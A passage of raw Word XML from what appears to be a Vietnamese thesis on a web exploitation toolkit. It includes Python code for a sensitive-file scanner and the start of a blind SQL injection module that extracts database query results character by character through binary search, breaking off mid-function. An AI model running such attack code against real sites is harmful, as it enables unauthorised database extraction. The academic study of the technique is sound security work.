              <w:t xml:space="preserve">        self.type = "Scan"  # Type: exploit | scanner | support</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.author = "namhb"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.version = "0.0.1"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.fileList = [</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "robots.txt",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            ".htaccess",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "web.config",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "login.php",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "admin.php",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "phpmyadmin",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "mysqladmin",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "backup",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.help = "" \</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">                    "This is help for module." \</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">                    ""</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">    def sendHttpGetRequest(self, url):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        if (url[:5] == "https"):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            r = requests.get(url, verify=False)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            r.headers["content-length"] = None</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            r = requests.get(url)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        return r</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">    def run(self):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        # We coding here</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        print("Site: {0} result:".format(self.basicOptions["URL"]["currentSetting"]))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        print("==========================")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        print("")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        print("\t{0:50s}{1:10s}{2}".format("Filename", "Code", "Size"))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        print("\t{0:50s}{1:10s}{2}".format("--------", "----", "----"))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        print("")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        for fileName in self.fileList:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            r = self.sendHTTPRequest(fileName)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            print("\t{0</w:t>
            </w:r>
            <w:r w:rsidRPr="000B0F4B">
              <w:lastRenderedPageBreak/>
              <w:t>:50s}{1:10s}{2}".format(fileName, str(r.status_code), r.headers["content-length"]))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00851221" w:rsidRPr="00851221" w:rsidRDefault="00851221" w:rsidP="00851221">
      <w:r>
        <w:t xml:space="preserve">Đối với phương pháp truyền thống, duyệt hết các ký tự tương đối đơn giản. </w:t>
      </w:r>
      <w:r w:rsidRPr="00851221">
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cũng đã được phát triển sẵn module này nên luận văn không đi sâu vào chi tiết. Chi tiết module này (sqlinjection.blind) có thể tham khảo trong </w:t>
      </w:r>
      <w:r w:rsidR="00D655B3">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>mục 1 P</w:t>
      </w:r>
      <w:r>
        <w:t>hụ lụ</w:t>
      </w:r>
      <w:r w:rsidR="00D655B3">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00D655B3">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C4895">
        <w:t>của luận văn</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0F4B" w:rsidRDefault="00416450" w:rsidP="00416450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_Toc459374357"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Xây dựng mã tấn công sử dụng phương pháp tìm kiếm nhị phân</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
    </w:p>
    <w:p w:rsidR="00416450" w:rsidRDefault="00416450" w:rsidP="00416450">
      <w:r>
        <w:t>Để xây dựng mã tấn công dạng tìm kiếm nhị phân, luận văn sẽ xây dựng các hàm sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5176" w:rsidRDefault="00BE5176" w:rsidP="00BE5176">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hàm checkQuery().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5176" w:rsidRDefault="00BE5176" w:rsidP="00BE5176">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F18">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A00C0" w:rsidRDefault="006A00C0" w:rsidP="00BE5176">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="006A00C0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5176" w:rsidRDefault="00BE5176" w:rsidP="00BE5176">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các hàm mặc định tuân thủ theo chuẩn của </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5176">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK: Hàm run() và hàm __init()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00416450" w:rsidRDefault="00416450" w:rsidP="00416450">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Hàm checkQuery() thực hiện kiểm tra kết quả trả về là đúng hay là sai. Để xác định điều này sẽ tìm kiếm chuỗi pattern. Nếu có chuỗi này thì sẽ là True, không có là False. Giá trị chuỗi pattern được thiết lập thông qua tham số PATTER</w:t>
      </w:r>
      <w:r w:rsidR="00E644EE">
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> khi chạy </w:t>
      </w:r>
      <w:r w:rsidRPr="0060415D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK</w:t>
      </w:r>
      <w:r w:rsidR="00E644EE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, sau đó truyền vào tham số payload của hàm</w:t>
      </w:r>
      <w:r w:rsidR="00835F18">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> checkQuery()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidTr="001F7160">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:t>def checkQue</w:t>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:lastRenderedPageBreak/>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:lastRenderedPageBreak/>
              <w:t>y(self, payload):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t># Return true/false of query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t># If contain, return True, if not, return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t># Or use regex</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t xml:space="preserve">r </w:t>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t>self.sendHTTPRequest(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t>if(r.text.find(self.basicOptions["PATTERN"]["currentSetting"]) &gt; 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t>return True</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t>return False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00416450" w:rsidRDefault="00835F18" w:rsidP="00416450">
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F18">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t>() nhận đầu vào là một query (câu lệnh SQL mà kẻ tấn công muốn chạy). Hàm sẽ lần lượt lấy từng ký tự bằng phương pháp tìm kiếm nhị phân. Hàm sẽ kiểm tra giá trị AS</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CII của ký tự có nhỏ hơn giá trị trung bình cộng của imin (cận dưới) và imax (cận trên). Nếu đúng thì tiếp tục kiểm tra trong trong khoảng dưới, nếu sai sẽ tìm kiếm ở khoảng trên. Sau mỗi yêu cầu, khoảng tìm kiếm thu hẹp được một nửa.</w:t>
      </w:r>
      <w:r w:rsidR="00656FC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B4DE2" w:rsidRPr="009B4DE2" w:rsidTr="009B4DE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:t>def getMySQLQueryResult(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t># Binary search</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>if(self.resultLength != None):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>for i in range(0, self.resultLength):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t># Single character</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imin </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imax </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>self.maxLength</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>while(imin &lt;= imax):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
